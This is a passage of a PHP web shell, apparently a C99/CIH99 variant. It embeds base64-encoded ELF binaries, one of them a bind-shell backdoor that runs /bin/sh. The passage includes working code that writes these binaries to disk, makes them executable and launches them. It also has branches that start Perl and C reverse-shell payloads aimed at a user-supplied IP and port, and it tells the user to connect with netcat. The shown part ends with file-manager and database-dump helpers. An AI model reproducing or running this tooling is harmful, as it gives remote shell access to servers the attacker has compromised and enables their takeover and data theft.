AEgAAAEwBAACwhAQIAAAAABIACgBSAQAAAAAAAKwBAAASAAAAZAEAANiFBAgAAAAAEgAMAGsBAAAAAAAArwAAABIAAAB9AQAALJkECAAAAAAQAvH/kAEAABSIBAhSAAAAEgAMAKABAAAAAAAAJwAAABIAAAC1AQAAZJoECAAAAAAQAPH/wQEAAICGBAiTAQAAEgAMAMYBAAAAAAAA3QAAABIAAADjAQAALJkECAAAAAAQAvH/9AEAAAAAAAA6AAAAEgAAAAQCAAAAAAAAqgEAABIAAAAWAgAAWJoECAAAAAAgABYAIQIAANCIBAgAAAAAEgANACcCAAAsmQQIAAAAABAC8f87AgAAAAAAADYAAAASAAAATAIAAAAAAADZAAAAEgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
321$backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCToPf3//8dEJAQBAAAAi0X0iQQk6Cr9///HRCQEAgAAAItF9IkEJOgX/f//x0QkCAAAAADHRCQEn4kECMcEJJ+JBAjoe/z//4tF8IkEJOiA/P//xwQkAAAAAOgE/f//i0X0iQQk6Gn8///pDv///1WJ5VdWMfZT6H/9//+BwyMSAACD7AzoEfz//42DIP///42TIP///4lF8CnQwfgCOcZzFonX/xSyi0Xwg8YBKfiJ+sH4AjnGcuyDxAxbXl9dw1WJ5YPsGIld9Ogt/f//gcPREQAAiXX4iX38jbMg////jbsg////Kf7B/gLrA/8Ut4PuAYP+/3X16DoAAACLXfSLdfiLffyJ7F3DkFWJ5VOD7AShrJkECIP4/3QSu6yZBAj/0ItD/IPrBIP4/3Xzg8QEW13DkJCQVYnlU+i7/P//gcNfEQAAg+wE6LH8//+DxARbXcMAAAADAAAAAQACADo6IHc0Y2sxbmctc2hlbGwgKFByaXZhdGUgQnVpbGQgdjAuMykgYmluZCBzaGVsbCBiYWNrZG9vciA6OiAKCgBzb2NrZXQAYmluZABsaXN0ZW4AL2Jpbi9zaAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAACQAAAAMAAAAiIQECA0AAAAkiQQIBAAAAEiBBAgFAAAAEIMECAYAAADggQQICgAAALAAAAALAAAAEAAAABUAAAAAAAAAAwAAAIyaBAgCAAAAeAAAABQAAAARAAAAFwAAABCEBAgRAAAACIQECBIAAAAIAAAAEwAAAAgAAAD+//9v6IMECP///28BAAAA8P//b8CDBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwJkECAAAAAAAAAAAtoQECMaEBAjWhAQI5oQECPaEBAgGhQQIFoUECCaFBAg2hQQIRoUECFaFBAhmhQQIdoUECIaFBAiWhQQIAAAAAAAAAAC4mQQIAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAAAcAAAAAgAAAAAABAAAAAAAoIUECCIAAAAAAAAAAAAAADQAAAACAAsBAAAEAAAAAADohQQIBAAAACSJBAgSAAAAiIQECAsAAADEhQQIJAAAAAAAAAAAAAAALAAAAAIAmwEAAAQAAAAAAOiFBAgEAAAAO4kECAYAAACdhAQIAgAAAAAAAAAAAAAAIQAAAAIAegAAAJEAAAB5AAAAX0lPX3N0ZGluX3VzZWQAAAAAAHYAAAACAAAAAAAEAQAAAACghQQIwoUECC4uL3N5c2RlcHMvaTM4Ni9lbGYvc3RhcnQuUwAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvZ2xpYmMtMi4zLjYvY3N1AEdOVSBBUyAyLjE2LjkxAAGAjQAAAAIAFAAAAAQBWwAAAMSFBAjEhQQIYgAAAAEAAAAAEQAAAAKQAAAABAcCVAAAAAEIAp0AAAACBwKLAAAABAcCVgAAAAEGAgcAAAACBQNpbnQABAUCRgAAAAgFAoYAAAAIBwJLAAAABAUCkAAAAAQHAl0AAAABBgSwAAAAARmLAAAAAQUDSIkECAVPAAAAAIwAAAACAFYAAAAEAYIAAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRpLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgIwAAAACAGYAAAAEAS8BAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRuLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgAERABAGEQESAQMIGwglCBMFAAAAAREBEAYSAREBJQ4TCwMOGw4AAAIkAAMOCws+CwAAAyQAAwgLCz4LAAAENAADDjoLOwtJEz8MAgoAAAUmAEkTAAAAAREAEAYDCBsIJQgTBQAAAAERABAGAwgbCCUIEwUAAABXAAAAAgAyAAAAAQH7Dg0AAQEBAQAAAAEAAAEuLi9zeXNkZXBzL2kzODYvZWxmAABzdGFydC5TAAEAAAAABQKghQQIA8AAATMhND0lIgMYIFlaISJcWwIBAAEBIwAAAAIAHQAAAAEB+w4NAAEBAQEAAAABAAABAGluaXQuYwAAAAAAqQAAAAIAUAAAAAEB+w4NAAEBAQEAAAABAAABL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UAAGNydGkuUwABAAAAAAUC6IUECAPAAAE9AgEAAQEABQIkiQQIAy4BIS8hWWcCAwABAQAFAoiEBAgDHwEhLz0CBQABAQAFAsSFBAgDCgEhLyFZZz1nLy8wPSEhAgEAAQGIAAAAAgBQAAAAAQH7Dg0AAQEBAQAAAAEAAAEvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdQAAY3J0bi5TAAEAAAAABQLohQQIAyEBPQIBAAEBAAUCO4kECAMSAT0hIQIBAAEBAAUCnYQECAMJASECAQABAWluaXQuYwBzaG9ydCBpbnQAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBsb25nIGxvbmcgaW50AHVuc2lnbmVkIGNoYXIAR05VIEMgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAbG9uZyBsb25nIHVuc2lnbmVkIGludABzaG9ydCB1bnNpZ25lZCBpbnQAX0lPX3N0ZGluX3VzZWQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAuZGVidWdfYXJhbmdlcwAuZGVidWdfcHVibmFtZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAAFIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAJgAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsAAAACAAAA4IEECOABAAAwAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAABCDBAgQAwAAsAAAAAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAADAgwQIwAMAACYAAAAEAAAAAAAAAAIAAAACAAAAVAAAAP7//28CAAAA6IMECOgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAAAiEBAgIBAAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAAAQhAQIEAQAAHgAAAAEAAAACwAAAAQAAAAIAAAAdQAAAAEAAAAGAAAAiIQECIgEAAAXAAAAAAAAAAAAAAABAAAAAAAAAHAAAAABAAAABgAAAKCEBAigBAAAAAEAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAACghQQIoAUAAIQDAAAAAAAAAAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAJIkECCQJAAAdAAAAAAAAAAAAAAABAAAAAAAAAIcAAAABAAAAAgAAAESJBAhECQAAYwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAIAAACoiQQIqAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAmQAAAAEAAAADAAAArJkECKwJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAABAAAAAwAAALSZBAi0CQAACAAAAAAAAAAAAAAABAAAAAAAAACnAAAAAQAAAAMAAAC8mQQIvAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAArAAAAAYAAAADAAAAwJkECMAJAADIAAAABQAAAAAAAAAEAAAACAAAALUAAAABAAAAAwAAAIiaBAiICgAABAAAAAAAAAAAAAAABAAAAAQAAAC6AAAAAQAAAAMAAACMmgQIjAoAAEgAAAAAAAAAAAAAAAQAAAAEAAAAwwAAAAEAAAADAAAA1JoECNQKAAAMAAAAAAAAAAAAAAAEAAAAAAAAAMkAAAAIAAAAAwAAAOCaBAjgCgAABAAAAAAAAAAAAAAABAAAAAAAAADOAAAAAQAAAAAAAAAAAAAA4AoAACYBAAAAAAAAAAAAAAEAAAAAAAAA1wAAAAEAAAAAAAAAAAAAAAgMAACIAAAAAAAAAAAAAAAIAAAAAAAAAOYAAAABAAAAAAAAAAAAAACQDAAAJQAAAAAAAAAAAAAAAQAAAAAAAAD2AAAAAQAAAAAAAAAAAAAAtQwAACsCAAAAAAAAAAAAAAEAAAAAAAAAAgEAAAEAAAAAAAAAAAAAAOAOAAB2AAAAAAAAAAAAAAABAAAAAAAAABABAAABAAAAAAAAAAAAAABWDwAAuwEAAAAAAAAAAAAAAQAAAAAAAAAcAQAAAQAAADAAAAAAAAAAEREAAL8AAAAAAAAAAAAAAAEAAAABAAAAEQAAAAMAAAAAAAAAAAAAANARAAAnAQAAAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAABIGAAA8AUAACEAAAA/AAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAAOB4AALIDAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAADggQQIAAAAAAMABAAAAAAAEIMECAAAAAADAAUAAAAAAMCDBAgAAAAAAwAGAAAAAADogwQIAAAAAAMABwAAAAAACIQECAAAAAADAAgAAAAAABCEBAgAAAAAAwAJAAAAAACIhAQIAAAAAAMACgAAAAAAoIQECAAAAAADAAsAAAAAAKCFBAgAAAAAAwAMAAAAAAAkiQQIAAAAAAMADQAAAAAARIkECAAAAAADAA4AAAAAAKiJBAgAAAAAAwAPAAAAAACsmQQIAAAAAAMAEAAAAAAAtJkECAAAAAADABEAAAAAALyZBAgAAAAAAwASAAAAAADAmQQIAAAAAAMAEwAAAAAAiJoECAAAAAADABQAAAAAAIyaBAgAAAAAAwAVAAAAAADUmgQIAAAAAAMAFgAAAAAA4JoECAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAADABoAAAAAAAAAAAAAAAAAAwAbAAAAAAAAAAAAAAAAAAMAHAAAAAAAAAAAAAAAAAADAB0AAAAAAAAAAAAAAAAAAwAeAAAAAAAAAAAAAAAAAAMAHwAAAAAAAAAAAAAAAAADACAAAAAAAAAAAAAAAAAAAwAhAAEAAAAAAAAAAAAAAAQA8f8MAAAAAAAAAAAAAAAEAPH/KAAAAAAAAAAAAAAABADx/y8AAAAAAAAAAAAAAAQA8f86AAAAAAAAAAAAAAAEAPH/dAAAAMSFBAgAAAAAAgAMAIQAAAAAAAAAAAAAAAQA8f+PAAAArJkECAAAAAABABAAnQAAALSZBAgAAAAAAQARAKsAAAC8mQQIAAAAAAEAEgC4AAAA4JoECAEAAAABABcAxwAAANyaBAgAAAAAAQAWAM4AAADshQQIAAAAAAIADADkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
322
323function cf($fname,$text) {
324 $w_file=@fopen($fname,"w") or err();
325 if($w_file) {
326 @fputs($w_file,@base64_decode($text));
327 @fclose($w_file);
328 }
329}
330
331function cfb($fname,$text) {
332 $w_file=@fopen($fname,"w") or bberr();
333 if($w_file) {
334 @fputs($w_file,@base64_decode($text));
335 @fclose($w_file);
336 }
337}
338function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
339function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }
340
341if (!empty($_POST['backconnectport']) && ($_POST['use']=="cihb")) {
342 $ip = gethostbyname($_SERVER["HTTP_HOST"]);
343 $por = $_POST['backconnectport'];
344 if (is_writable(".")) {
345 cfb("cihb",$backdoor);
346 ex("chmod 777 cihb");
347 $cmd = "./cihb $por";
348 exec("$cmd > /dev/null &");
349 $scan = myshellexec("ps aux");
350 } else {
351 cfb("/tmp/cihb",$backdoor);
352 ex("chmod 777 /tmp/cihb");
353 $cmd = "./tmp/cihb $por";
354 exec("$cmd > /dev/null &");
355 $scan = myshellexec("ps aux");
356 }
357 if (eregi("./cihb $por",$scan)) {
358 $data = ("\n<br>Backdoor setup successfully.");
359 } else {
360 $data = ("\n<br>Process not found, backdoor setup failed!");
361 }
362 $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
363}
364
365if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
366 if (is_writable(".")) {
367 cf("back",$back_connect_pl);
368 $p2 = which("perl");
369 $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
370 if (file_exists("back")) { unlink("back"); }
371 } else {
372 cf("/tmp/back",$back_connect_pl);
373 $p2 = which("perl");
374 $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
375 if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
376 }
377 $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
378}
379
380if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) {
381 if (is_writable(".")) {
382 cf("backc",$back_connect_c);
383 ex("chmod 777 backc");
384 $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
385 if (file_exists("backc")) { unlink("backc"); }
386 } else {
387 ex("chmod 777 /tmp/backc");
388 cf("/tmp/backc",$back_connect_c);
389 $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
390 if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
391 }
392 $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
393}
394## End of Backdoor ##
395
396if ($act != "img") {
397 $lastdir = realpath(".");
398 chdir($curdir);
399 if ($updatenow) { @ob_clean(); cih99_getupdate(1); exit; }
400 $sess_data = @unserialize($_COOKIE["$sess_cookie"]);
401 if (!is_array($sess_data)) { $sess_data = array(); }
402 if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
403 if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
404 ch99_buff_prepare();
405 foreach (array("sort","sql_sort") as $v) {
406 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
407 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
408 }
409 if ($sort_save) {
410 if (!empty($sort)) {setcookie("sort",$sort);}
411 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
412 }
413 if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
414 if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
415 if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
416 if (!function_exists("mysql_dump")) {
417 function mysql_dump($set) {
418 global $ch_ver;
419 $sock = $set["sock"];
420 $db = $set["db"];
421 $print = $set["print"];
422 $nl2br = $set["nl2br"];
423 $file = $set["file"];
424 $add_drop = $set["add_drop"];
425 $tabs = $set["tabs"];
426 $onlytabs = $set["onlytabs"];
427 $ret = array();
428 $ret["err"] = array();
429 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
430 if (empty($db)) {$db = "db";}
431 if (empty($print)) {$print = 0;}
432 if (empty($nl2br)) {$nl2br = 0;}
433 if (empty($add_drop)) {$add_drop = TRUE;}
434 if (empty($file)) {
435 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
436 }
437 if (!is_array($tabs)) {$tabs = array();}
438 if (empty($add_drop)) {$add_drop = TRUE;}
